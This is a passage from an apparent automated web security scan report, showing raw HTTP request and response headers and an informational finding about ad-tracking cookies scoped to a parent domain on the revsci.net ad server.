rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_--QM="MLsXrqMOJjhroJB0OsFGTywSQa5gE3bzGLWC77EYlL0V6PUwpFqMKfRo/WIjxatotGUBLfh18Iw7W+qkAQ46bVHoTrv1pQwNKjjgNCNHJPbpAgH4IzR/+iRbVue91oXW/jKsDPa7vbvxtrd33fHq34yrFQuJku+bgm+8EVffudcKN4iuBvrN90qHeI4xaY/Q1W1yNsL5KOlsGxNqhUiNOXe5nn986aJ67S/0tULtWPdrG3lhpPsdb8xO/n/lB581aDn762WB0ihbZBOeu3Ufx+HpLRh+8Hbf0zZq8pfGKCS0hlRrIAabwnKXGJwRIMywuWQPjThCbo0KSSFQIP4mo76IAHMZnYNH0tuqRyB/AEZngSZCLfLYF3Zs5g4nZoGO0cohFtEneaCcGDtskRpSY+dP7h0gnUP0L7R7A/8xlqSZ/W2KkRpVIhjwQAOTk48sJD1PxXjX0x5XdtsfLihcm9VuIUiHpGRUF7F/idal7Hq+0pROgbBT6KCcol1snnTV0V5F0xpBZk6CRy2ugCPvNan6L1McQFvgbXEKldtpFMfuZakR635XR4x1RXCLCkkxUCfQPGc6mBZWiKgoRHEO3b0otALBdNCIIFAiSKxefi0nPrtknQ3EMXhwwvPIzXKIQsOaoEWNpAIcShIHiDOF3qSKWFuDqkb2jqtMxvBdfAVFP7NcbvzKM+3/ueqaVRMDxCeeJ+flWQpzF+qS4BrI4Dt7AUZJ2EeFM4m41UyM+T7FSi5tA/qwqOwo4kK2gHpUVKssP2I+Ee7LhGobkwOJUOMfgbzVozWgQuSKoq5kZ88M185NbAGUupiqDKHqMcj+dBKc9fPP3KK+5EXLdrvEPS5YK+cSdBxxlTzlrYRJ3wJXAiV2dnrBaaQP+zIJOpgPpvL1xtxxrkjB56lwuYrzB2bgI6uI/AireNneSB71/kJavLpmOV3ZKyXlMBYkfyXB8qTG0Uev1gg9C57Wn8epqz8lCu0573dEnu71OAvS2jhxt+Kw6FPI+tTiLCxWwwjS81QgDUZk9v3k6axNYh2OWMWlOaV+U8pWNdAebenCcqc="; rsi_us_1000000="pUM1Iz9HMAYU1O2uQ6agQvHtomeq75Ig4g4EmJ/A6n4WsknjQhUq8iBul7F68iFx8cqm3SO9eaFvyn1GBw/eJPslZlA8PhpTTZGsXb7RjDc/iMgnjkeolupj4fLTEQPVKscYxoDVuEdJuZbaK3D9xPuOIhlowTJ+ya38j5p4Ta6Bz/HWeH0nosUPna7vHxaZ5XoL5l/dnmXwpPm5VWpbUOslRA5BxSe4ZOkSE9PAmD2iQJPexlX0wmcIAbK7tsGmzGATNf80Fqyl751/l8juNUu0JNYEx45nWIRv/C8BOiTiJbO5g8IGAzpcI40V+UQZmhqEPeeEc1fCQnI0TCPjgkID7R2wwigMSHt5VUBgTb+NyMxPLwLONDY3TuokJnmzHPnnRDkuVRiS5+Uyz4YpGNKGlhaPSdZ9n4EB3wX0uvpMSNK4Fmo9jIaSj+ncTHidAXiIgQDfusP6TCa9QdU2bznEQzcv9BCophz20fJ1WW+kENTBipABVnZA56YjECEEY3phD1JQzHGdVrVseyuEk6GWi92FSiGLJ4812+Br34U7q3VQBxTRSEt04mb9b+Nu053VTtbctHkK68djsAFkE74d8kPDFLOH8lRboZwLXX6HqUXD02RKMs5PWsH+ziouWDQYmVb8hZ/ecArQiVYBI4aPw+kfQuXmbioB2aEC0lxOEpHD/Ns9MsBpCzc5UqHnCYeRcpcYLhhYm4BPjPFrgYw8D4NABb/5+fzD8h2U3LvMxcVcLWdaMX4aKoPVH+KL74p/EdmylBc1de/czv/dSpACqyj0uifAEyPR50aV9cwCBjohIoFo9EOMVH6RMd7onZ55R4I4FSIgeCRK0c4wgNxjTMXno77nWOf381e4nnQbO463zH1b2jgH0FmsgwCxBKR5LsbHEUqdx0oVuJzssP3YK75lqpQheuu3QYCc6leVSJ0morqXGrRuMXQbQrgyVMCQgz3qL/OFP/kN/cJMZe6ViH5t1Gdp7bjk4yCudY/fH/RWKgw9ywS7g4LBjxX2XrVDkyrkyMkUeGj92tKDN3nwYWN2isOHQc0tZtLOL/8WEUOseW6PUtOc7HPHXkhurCilOyFhqPwtVkrNV9iwiE6/OEwXFDX/aXR9ceCoOAiQkffNc/FhNzpBQE1u8u3E6JnrXkfFsNN0SqpfDvGaQnlA5yxO+k/zo/hv8QT1f8yC4/H0b0V3oZQU62XPrD2wB5Kv4sv8RmzGKE7qz8BL2mQX29agkU8ECTuBwmAb6UIzgDgLdezAM7zWMEN9lNvnbyEhVz4KlJteKeaP6JM8QWkSqGwqE4JwqHmmDFepCsQRHRGrBiMwJA76NRpMK59CxAt0fbzHEYqA+JmFKmMDiGhSr7vA0le7ggiHcPnY4yw16dWwbcJEsbg9ulXJ4JGMYgnw7KoKzVD4RSJBC230sX+mBeGHoQSxN08MTZ+4NCxPZspf/4y9JLqybhHYnhyK+r/gBv5lHBLh2Qjg3gH9Ms4jvQ6ewPsqEIGFdCBtnIuWzVKiX5T6glm3a6fLZrlR/OoU"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7Gnt="MLsXrqEO5ihr4JB0esFCP3iNF+pqmlub49aGmOkZz5qg3MoTcqeWbmliBEBiXf5iQVJEExBOdq4FjLd2iQGfFfRL/ql3vrzlT19lOKExbhBpGeSZT/oLCk2e4ffVgY0aDJ1uvtvUub/FrtByJKJuLfZer6ZFcp297ersMcCKWDghV0ndvnIp0ubN9s+L4XcV4gqUaLHaTBCzh59PWcCdqx5qql2sm+3+Fsp134KHZC+10dxmr/h2YPgrCQqlE1efdhVBy1mZ7UI9etUD9Q2vo2HKLKfq9HTRcMF7gvVBk6CX9dJqUNISrnFRzxK9I16Ze3gfnZMoYTvLGxzAujjGYgCBQHydRq3NVcxWHFqhjRyDYKMOimyVpBK/ej4cUFyMPuBapiZYAS+rRHNi2ReS4mBcOdI+kc0Sund6Oo8hlry4ImUOmhdRINCA6C7zqOTFINl5xGgXWwxPdANsISvg71h8oO6xP2wQVtZweTd2T3K400B4YdU0OCBbecxvUFE5I4HLNnVvO62maFGwXjcgxZKAa5SsW8dHk66Y8GjRMAd94ILbDGnKfs4wZh2R1y74X41joKW4WyD6hz1th/jdD24csANgpYVTf+WvMJhk1XuGdB6Vk+pz2NkjdsC8jwl3PNW7yoxWnby31j++1k5brdu2yrelw8/600dTtJ3lbwNhQ8ZUclNZ1PsBaUFiBUyiyKvQ/P8KE/i9La90q8j9I0CiOV/wwv7LKH1NeeF7MZAWFMOky8fZGQEYBHHqHh9HItYcPRDJHYaAKfPXRfVi4xpD3YJaeN9hBgfCu1SVahEpxVEQAokzPDcGLmCaxJqxlQqLLbD8hW1oHweNYdgZUHp5QuKXDFYpUoZLVaqngTPm5fO1BA8OSKZDjMsQ7Fe1GUPgTzic8rAfX1VwOlHBDBDTT3SuyF8e7ai7LUsohv0VtOqoZvYupIjAFDPeAac5Rc3MXPsEPgOLDDba3hNstl+qzh6YnF2zZ/ikkzOk+kEjNEJwcyXDQP/6gF24TmkWLEwF4enQzCwKzN7gC11i85xkhK0/fqO5EaF1RsVX3c+rfizRIYPFcsw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUNFIz1H8Bcc1M2QQ6eoQtXsImOq5xMg6w5HyyqatgLAr7yjOUThNYktpeAHrY+3W/Rk6NTESS4BwdCr1eHt/9ZkNKrCo6s3fabpmNBDwjRy3TGbk1xeK9kSMFgtwIuKczX4GzBspBjAuZwMmhoplDJh7A9z6RiBOinwtBeHiVcN0i6v6Gm1sxfd5xp1wuCF5WZs9kbwlWvr4NZ3g93GtCPa+q1U3LVpSvRK0UuludpVgBkLBr6GmT6i4WYYMVSbP5sllrENJ/vgWFptkkKA7v52VrZ6nH3vXNoHtOYAS2yJ/FfDyNCCwb6Rxtu5T0QGEEygc1Vek+zD8vsvm9Z7ts8y8DzrWIA+L6QbtLqvJ1Cu2xPMZlUdb1O4zSJ4vc7AcDWyHZMX8gZj5tAemXjKW8wO3jOPJ7SmwxzcAo3WdFavBofRh8t0E3uHrsAcrQpcSPbVqbGt1e3/UyCFwCzFUuTUmlrNmPxLnvnZmtxVaM9316IQRVs837aGn0ks1oedN0p6hUxDsaJ5ZBVmHNpHHdeedyHrWjyJ/1wyX4wJNVgeXnsM6ilSJ3Ehvf4UokF6eCfynXmVi5tEPblDsKdz0gLUKCQ7cr6/s6b69jA8zc9QRWdxKca2+RWxPviS6c2h8wrj2rf0tEuORJ+Uwb4rey9qg25EyXxss4pPjjnAeJPw3/YUbvxzjKPX3JmMyogSlfJWxMxdcQbHoHZ3cnZ8CMXsUBZo05Zu82Flj6Tc5xYaiJg+9o4I3Ey7XhuyLiwT+eQRLlYwuETrot957yBew0Fkj4RBLqUmAXrvKhR4XNwVEz7IrlWvUBo7qrGSAA4dV4jLZ4SCzPY2e4jS5ZlzqWWkpG84+clO4BXnB8T5fSwN1hMufzM8cWn5qssUwcRHMfxSMzEQnVELAXWCD8XnFM+O7bXi4tiDjcdFxbASSHfZ0DPfirZ0GrtvPfp4GUxJ4EUP+Q7f0JGdYf85bX7yQR8UTpizWaDf4nx9WmSWQZBYoaRX4DPO8mDn02s2/XeR66dS3pVwhC/nBXLMs+noD9+3NjceioQX93XzXW+hZpbrmpDbxL1My5MSRv1RW1FbhrAV0YFG9Hrw5avHRu2vgsXJwtswcKQduxCXN3reGFDYnE/twZvGMzFBwE1u7u1EapnsTifVMDN1TqhDHs4EQZlCK8dfAamWdz2neAXn7Ag2QqcwNPO3UXWSBKDhR2XfX9GpGrRip1xv3ueUAiS6sEHA273xIgUgU6sdyErUVLQlqA1SGUq49shVhg8wrY3AEtHacnZrP3WYzFgPaFMrp37rlYYy8zb0Scsdi6aQPsE9Urkf1agfH0Uty6V30sefD+k2ZMM2eNWsW6oKjWcTeeU85I6hwZmo+dvhtl0gi4GgJH2E3QBQfS8RoKgYr8TZ0GBaDo2K/Zj7eWLxDGt0it+hDeFnGhRSYPFLVEKrcTnbp+N+ufxGpgs42aKc47x3NAkbyo4UlDHYpZ8R6Hg+Iw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:58 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...
9.11. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-1044587-596291-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==; rsiPus_xqR7="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIshOB9JrGlJ9XZP2PSMq545hyVBVJdSnkgvS5ixQ2jzsY0ZWA+JOFBhqviZCWubV71mmTZ/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJ61W1sllb6Nc3moNgaTi0sWkkQCbNz7hXNo2IsC53dW3VuuZsmJb9X0AgiDcheSzlnAsnUq4LYdtCMaskgIpbgmkSHb9PrS66rT7Grgzql7HtldL8iE5xypWITXabh97tTpkU/qmOFPl2cWsADKk2Rc1gNqCs/wCa2GpcRYzsBBlGWu1Rx6Ss0719jAJPt3A0/cgXMK9v1+nMWxleyRS9Py7rbiFbkbA4dy82s+YNiWD1Bp0B/8YPQvjz5m6VsPK2bApJbudN0kRmgDQwBFdNYNT3Zod7YBYp+BG3MVnzNBbnI+yHUMxY8gaTCU7GSuHnVmZTUzeXLyNzdjGXICYBnSWVVzTm1uYa+UU29wqPQ14C9Ay7tt6GPEWSA5zQxfYzeLi20J0Nl7IC6vXnM8Od1ipWmbzVPXl7hr95e/RGmwPBkmqRC5aamjDudjkvgSbR3b42ft+lD1GQzV25ioqJNKAAsRVoMjgqHOtgRDBe0DOKYrT+tMQWMGn6nEChsmBKyFveyHmvauyQe182HvP5WE9xxj/WW1VFGrZH10B6y51pelmZhY2yUVhLbCHFAF1wgg9I1NLCQ22j9FIDUznCf6vIcdZKG8/ZdiKwDfKAnA8AB53vXcXDFW+bqz0Qi9tJP3HFnfYb06h1kepNXQWZKlZVW8wLE6GcYgBaTn7Edmli85qT4S83vxtkUUbMAtf+b0E1nSeX3q+qrQ2YpBw97usUXF9qEw1Kga7ue4/koD8yQel/qNlEjame/tLJ0jduVB+ytBY9sF93mgbUlL2ZeG9dCIkZ+m+iWAynUZGRAG3mH4zdRt6QJFtJnrSudJUxkSp36hMpMqoyWjYf/0Dzxx8sSoHwbQLc7K4XYWzwFKXoqtXqULfas/iA=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeon8inPHPsPHufQb0id4nnMJw2upjcbtYuTDvN446mDNk0rjriNSbgDKZc06/pZLd8/z5IM1+qarydvJImOaUCavF5tQ+vJTy0vmLIKK5JakfcZvZ6vY5TRBbUhvbhTFBLWagpBIVk9PAmF2iRJOeh7n11Dcn8bkilhzvJuOwSrWjLV4c1dKSmGQXQgUCCrlrfg5dBoy/uKX5D/DErzUQPBw5wzlcHY0pwcQ4ohqHveeUO1fCklYt3yNLi8Ih4fiXA7KtiQmAv01haIfBqzbc3dy7UBOXBFA5UQx+zZY6T+r0AEWHCqu9zrcpE/K+dhafAfZdl6F9XwAK29pKStK8Vmo/hIZWj6P4pKDIwHnsIzs/CsI6oGdONCs57jOPg55C+8Eo4w2eN8X6XGvloOwC16CAbvKgsBHdOES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafiVSeTecIJRVt18r+Pf6AVQ9smmgMCZPjqwiXHhyXFqLJwepQkHnViNF27BPMR76afEDXmQK4X5YtD+7lbiGoEtKEsos76lXkFDeXHHplOgEvw0R+YSyi6fZVTgUbyYjzKicP8ItTRSjGP+9wmw4+6